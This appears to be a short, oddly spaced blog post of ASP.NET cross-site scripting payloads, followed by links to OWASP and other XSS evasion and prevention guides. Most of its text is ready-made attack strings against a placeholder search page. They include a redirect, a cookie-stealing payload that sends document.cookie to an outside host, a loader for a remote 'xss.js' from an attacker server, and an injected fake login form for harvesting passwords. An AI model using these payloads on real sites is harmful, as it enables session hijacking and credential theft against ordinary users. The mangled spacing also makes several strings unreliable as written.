Asp.net cross-site scripting attack XSS instance sharing

Asp.net cross-site scripting attack XSS instance sharing
Asp.net cross-site scripting attack XSS instance sharing

Common attack code:

http://target/vuln-search.aspx?term= </XSS/*-*/STYLE = xss: e/**/xpression (alert ('xsss')> Redirection Attackhttp://target/vuln-search.aspx?term= </XSS/*-*/STYLE = xss: e/**/xpression (window. location =" http://www.xxx.com ")> Cookie stealinghttp://target/vuln-search.aspx?term= </XSS/*-*/STYLE = xss: e/**/xpression (window. location =" http://www.xxx.com /Cookiemonster. php? Sid = "% 2bdocument. cookie)> Unrestricted HTML injection from external '. js' filehttp://target/vuln-search.aspx?term= </XSS/*-*/STYLE = xss: expression (myScript = document. body. appendChild (document. createElement ("script")> </XSS/*-*/STYLE = xss: expression (myScript. setAttribute ("src "," http://attackerserver/xss.js ")> Where 'xss. js 'could contain a snippet that overwrites the entire document's HTML body. i. e.: document. body. innerHTML = '<B> since we can now insert brakets without having to escape the request filtering, we \'re free to insert any HTML tags </B> </br> <form name = "myform" action =" http://www.procheckup.com "> <Input type =" text "name =" login "> <br/> <input type =" password "name =" password "> </br> <input type = "submit" value = "Log in"> </form> '; <object> <param name = "src" value = "javascript: alert (0)"> </param> </object> <object data = "javascript: alert (0) "> <isindex type = image src = 1 onerror = alert (1)> <isindex action = javascript: alert (1) type = image <x: script xmlns: x =" http://www.w3.org/1999/ Xhtml "> alert ('xss'); </x: script> location = 'javascript: alert (0) '; location = name; http://site.com/?p= "; Eval (unescape (location) // # % 0 Aalert (0) <B/alt = "1" onmouseover = InputBox + 1 language = vbs> test </B> </a onmousemove = "alert (1) "> <a onmousemove =" alert (1) "> test </a> 
 
XSS script list: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Defense XSS list: https://www.owasp.org/index.php/XSS_ (Cross_Site_Scripting) _ Prevention_Cheat_Sheet
Share some instances:
Http://www.codeproject.com/Articles/573458/An-Absolute-Beginners-Tutorial-on-Cross-Site-Scrip
Http://www.codeproject.com/Articles/617043/Hack-Proof-Your-ASP-NET-Application-From-Cross-Sit
Xss "rel =" nofollow, noindex "> http://software-security.sans.org/developer-how-to/developer-guide-xss
Xss-vulnerabilities-in-asp-net-code.aspx "rel =" nofollow, noindex "> http://blogs.msdn.com/ B /cisg/archive/2008/09/10/real-world-xss-vulnerabilities-in-asp-net-code.aspx
Xss-attacks-in-asp-net-mvc "rel =" nofollow, noindex "> http://weblogs.asp.net/jongalloway/preventing-javascript-encoding-xss-attacks-in-asp-net-mvc
Http://www.softwaresecured.com/2013/03/04/asp-net-security-code-review-techniques-cross-site-scripting-edition/
Https://github.com/TelerikAcademy/ASP.NET-MVC/tree/master/04.%20ASP.NET%20Web%20Security
Other instances: http://www.securitysift.com/xss-and-cross-site-scripting-with-a-little-help-from-asp-net-and-ie9/